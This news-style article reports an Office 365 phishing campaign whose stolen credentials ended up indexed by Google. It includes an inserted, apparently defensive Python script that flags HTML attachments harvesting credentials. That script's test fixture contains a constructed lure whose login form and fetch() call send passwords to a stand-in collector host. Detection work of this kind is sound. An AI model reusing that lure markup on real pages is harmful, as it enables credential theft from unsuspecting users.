One of the best ways to store information so that it can be retrieved remotely is to put it on the internet.
Hackers do that too: when they hold valuable stolen user data, they want it to be easy to share with whoever they choose.
In a massive phishing campaign that has been running for more than half a year across dozens of domains, hackers have been stealing sensitive information from organizations worldwide by making fraudulent Microsoft Office 365 login requests.
The campaign has succeeded in bypassing email protection filters and has collected at least 1,000 login credentials for corporate Office 365 accounts.
The hackers also compromised legitimate WordPress servers to host malicious PHP pages and deliver them to victims.
Unfortunately for the hackers, they forgot to protect their loot.
Since anything placed on the web has an address, failing to protect that URL let Google Search crawl and index the stolen passwords for the public internet.
In a blog post, the researchers at cybersecurity companies Check Point and Otorio said that:
The hackers exfiltrated the information to domains they had registered specifically for the job.
However, they put the data in a publicly visible file that Google could index.
As a result, Google Search, whose crawlers continuously scan the web for new content, discovered the stash and surfaced it in search results for queries containing a stolen email address or password.
"Attackers usually prefer to use compromised servers instead of their own infrastructure because of the existing websites’ well-known reputations," the researchers explain.
On closer inspection of about 500 entries, the researchers found that the most frequent targets of the phishing attacks were companies in the construction, energy, and IT sectors.
According to the researchers, the hackers used several phishing email themes to lure victims into loading fraudulent landing pages built specifically to collect their Microsoft Office 365 username and password.
To make the phishing emails look legitimate and personalized, the hackers included the target's first name or company title in the subject line and purported to deliver a Xerox scan notification in HTML format.
When the attachment is opened in a web browser, a fake Microsoft Office 365 login form is overlaid on a blurred image. Meanwhile, JavaScript code runs in the background to check the validity of the credentials as the victim types.
If victims enter valid login credentials, the data is sent to the hackers' servers and the page redirects them to the legitimate Office 365 login page as a distraction.
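A defender-side way to catch this attachment pattern, as an added example that is not code from the article or from the Check Point and Otorio researchers: a heuristic triage of an HTML email attachment that looks for the three behaviours just described (a local password form, data leaving for a host that is not a genuine Microsoft sign-in host, and a decoy reference to the real login page), with the blurred preview image as a supporting indicator. The collector host, file names and both sample documents are constructed for the demo, and the trusted-host set is an assumption to tune per tenant.

```python
"""Heuristic triage of an HTML attachment for credential-harvesting behaviour.

Added example; all hosts and sample documents below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that may legitimately appear in a Microsoft sign-in flow.
# Assumption: a tuning knob for the analyst, not an authoritative allowlist.
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}

# Absolute http(s) URLs inside inline script text.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class _AttachmentScanner(HTMLParser):
    """Collects the few features the heuristic needs from the markup."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.script_text = []
        self.blurred_images = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "img" and "blur(" in a.get("style", "").lower():
            self.blurred_images += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def triage_html_attachment(html):
    """Return the indicators found and a verdict for one HTML attachment."""
    p = _AttachmentScanner()
    p.feed(html)
    p.close()
    urls = p.form_actions + URL_RE.findall("".join(p.script_text))
    hosts = {_host(u) for u in urls} - {""}
    exfil_hosts = sorted(hosts - TRUSTED_LOGIN_HOSTS)
    indicators = {
        "password_field": p.password_inputs > 0,
        "posts_to_untrusted_host": bool(exfil_hosts),
        "references_real_login_host": bool(hosts & TRUSTED_LOGIN_HOSTS),
        "blurred_preview_image": p.blurred_images > 0,
    }
    # Core rule: a sign-in form carried inside the attachment whose data goes
    # to a non-Microsoft host. The decoy redirect and blurred preview only
    # raise confidence; on their own they are common in legitimate mail.
    harvester = indicators["password_field"] and bool(exfil_hosts)
    verdict = "credential_harvester" if harvester else "benign"
    return {"verdict": verdict, "exfil_hosts": exfil_hosts, "indicators": indicators}


# Constructed sample resembling the lure described above (not the real kit):
# blurred "scan" preview, local sign-in form, data posted to a collector host,
# then a reference to the genuine login page used as the distraction.
SAMPLE_LURE = """<html><body>
<img src="scan.png" style="filter: blur(8px)">
<form id="f" action="https://collector.example.invalid/p.php" method="post">
  <input type="email" name="user"><input type="password" name="pw">
</form>
<script>
  fetch("https://collector.example.invalid/check.php");
  window.location = "https://login.microsoftonline.com/";
</script>
</body></html>"""

# Constructed benign sample: a plain notification that merely links to the portal.
SAMPLE_BENIGN = """<html><body>
<p>Your document is ready. Sign in at
<a href="https://login.microsoftonline.com/">Office 365</a> to view it.</p>
</body></html>"""

if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(name, triage_html_attachment(doc))
```

The benign sample links to the real portal and is not flagged, because a link to the legitimate host is not the signal; the signal is a password field whose contents leave for somewhere else. In a mail gateway this check would run on HTML attachments before delivery, and `exfil_hosts` gives the responder the domain to block and hunt for in proxy logs.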
To keep the campaign undetected, the hackers used compromised email accounts to distribute the fraudulent messages.
While the hackers behind this campaign aren't known, their failure to protect the stolen data undid their months-long effort.